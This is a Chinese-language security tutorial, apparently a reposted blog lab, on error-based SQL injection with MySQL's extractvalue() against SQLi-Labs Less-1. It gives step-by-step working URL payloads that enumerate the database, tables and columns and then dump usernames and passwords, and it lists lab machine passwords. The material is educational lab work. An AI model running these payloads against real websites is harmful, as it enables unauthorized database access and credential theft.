SQL注入的方法0x002

admin
admin
admin
0
文章
0
评论
2026-05-19 05:56:06 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文详细介绍了基于报错注入的SQL攻击方法,重点讲解extractvalue()函数在SQLi-Labs靶场Less-1关卡的应用流程。通过构造特定payload逐步获取数据库名、表名、字段名及用户凭证,并针对32字符显示限制提供了limit分页解决方案。实验证实了字符型注入漏洞的利用可行性,具备明确的攻防实践指导价值。 综合评分: 85 文章分类: WEB安全,渗透测试,漏洞分析,实战经验,安全工具

cover_image

SQL注入的方法0x002

原创

建哥聊安全 建哥聊安全

建哥聊安全

2026年5月18日 09:33 湖南

在小说阅读器读本章

去阅读

SQL注入-基于报错的注入1

实验目的

熟悉报错功能函数extractvalue()的用法,掌握基于报错的SQL注入基本流程。

实验环境

攻击机:Pentest-Atk

(1)操作系统:Windows 10

(2)安装的应用软件:Sqlmap、Burpsuite、FireFox浏览器插件Hackbar、FoxyProxy等

(3)登录账号密码:操作系统账号Administrator,密码Sangfor!7890

靶机:A-SQLi-Labs

(1)操作系统:CentOS 7

(2)安装的应用软件:Apache、MySQL(MariaDB)、PHP;DVWA、SQLi-Labs、Webug3.0漏洞网站环境

(3)登录账号密码:操作系统帐号root,密码Sangfor!7890

实验原理

(1)关于报错注入

基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、updatexml()、floor()、exp()等。

(2)关于extractvalue()函数

作用:对XML文档进行查询,相当于在HTML文件中用标签查找元素。 语法:extractvalue(XML_document, XPath_string) 参数1:XML_document是String格式,为XML文档对象的名称; 参数2:XPath_string(Xpath格式的字符串),注入时可操作的地方。 报错原理:xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:’xxxxxxxx’。

实验步骤

本实验的目标是:以SQLi-Labs网站的Less-1为入口,借助extractvalue()函数,利用基于报错的注入方式获取SQLi-Labs网站的登录用户名和密码。

1.访问SQLi-Labs网站

在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-1。访问的URL为:

http://[靶机IP]/sqli-labs/Less-1/

(注意大小写)

登录后,根据网页提示,先给定一个GET参数,即:

http://[靶机IP]/sqli-labs/Less-1/?id=1

此时页面显示id=1的用户名Dump、密码Dump。

说明:本实验环境中FireFox浏览器已预安装Hackbar插件,在FireFox界面按下键盘上的F9键启用或停用(本实验环境中默认为启用状态)。建议在注入过程中用Hackbar插件来调整payload参数!

2.寻找注入点

分别使用以下3条payload寻找注入点及判断注入点的类型:

http://[靶机IP]/sqli-labs/Less-1/?id=1′

运行后报错!

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and ‘1’=’1

运行后正常显示!

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and ‘1’=’2

运行后未正常显示!

由上述结果可以判断,网站存在字符型注入点。

3.获取网站当前所在数据库的库名

使用以下payload获取网站当前所在数据库的库名:

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and extractvalue(1,concat(‘~’,database()))–+

显示结果为security。

4.获取数据库security的全部表名

使用以下payload获取数据库security的全部表名:

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and extractvalue(1,concat(‘~’,(select group_concat(table_name) from information_schema.tables where table_schema=’security’)))–+

显示结果中,有一个名为users的表,这当中可能存放着网站用户的基本信息。

注意:extractvalue() 函数所能显示的错误信息最大长度为32,如果错误信息超过了最大长度,有可能导致显示不全。因此,有时需要借助limit来做分行显示,上述payload可以改为:

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and extractvalue(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=’security’ limit 0,1)))–+

//显示security库中的第1张表的名字

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and extractvalue(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=’security’ limit 1,1)))–+

//显示security库中的第2张表的名字

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and extractvalue(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=’security’ limit 2,1)))–+

//显示security库中的第3张表的名字

5.获取users表的全部字段名

使用以下payload获取users表的全部字段名:

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and extractvalue(1,concat(‘~’,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’)))–+

显示结果,users表中有id、username和password三个字段。

同上一个步骤相似,为了避免错误信息太长导致显示不全,有时需要借助limit来做分行显示,上述payload可以改为:

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and extractvalue(1,concat(‘~’,(select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1)))–+

//显示users表中的第1个字段的名字

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and extractvalue(1,concat(‘~’,(select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 1,1)))–+

//显示users表中的第2个字段的名字

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and extractvalue(1,concat(‘~’,(select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 2,1)))–+

//显示users表中的第3个字段的名字

6.获取users表id、username和password字段的全部值。

由于users表中存放着多组用户名和密码的数据,而每次只能显示一组数据,我们可以通过limit M,N的方式逐条显示,如

(1)显示第1组数据

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and extractvalue(1,concat(‘~’,(select concat_ws(‘,’,id,username,password) from security.users limit 0,1)))–+

显示结果为Dump,Dump。

(2)显示第2组数据

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and extractvalue(1,concat(‘~’,(select concat_ws(‘,’,id,username,password) from security.users limit 1,1)))–+

显示结果为Angelina,I-kill-you。

(3)显示第3组数据

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and extractvalue(1,concat(‘~’,(select concat_ws(‘,’,id,username,password) from security.users limit 2,1)))–+

显示结果为Dummy,p@ssword。

以此类推,可通过修改limit后面的参数,将users表中存放的所有用户信息全部暴露出来。 实验至此结束。

实验总结

本次实验,成功实现了对存在字符型GET注入点的网站的手工SQL注入,熟悉了extractvalue()函数的用法,掌握了基于报错的注入方法和流程。

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:建哥聊安全 建哥聊安全 建哥聊安全《SQL注入的方法0x002》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0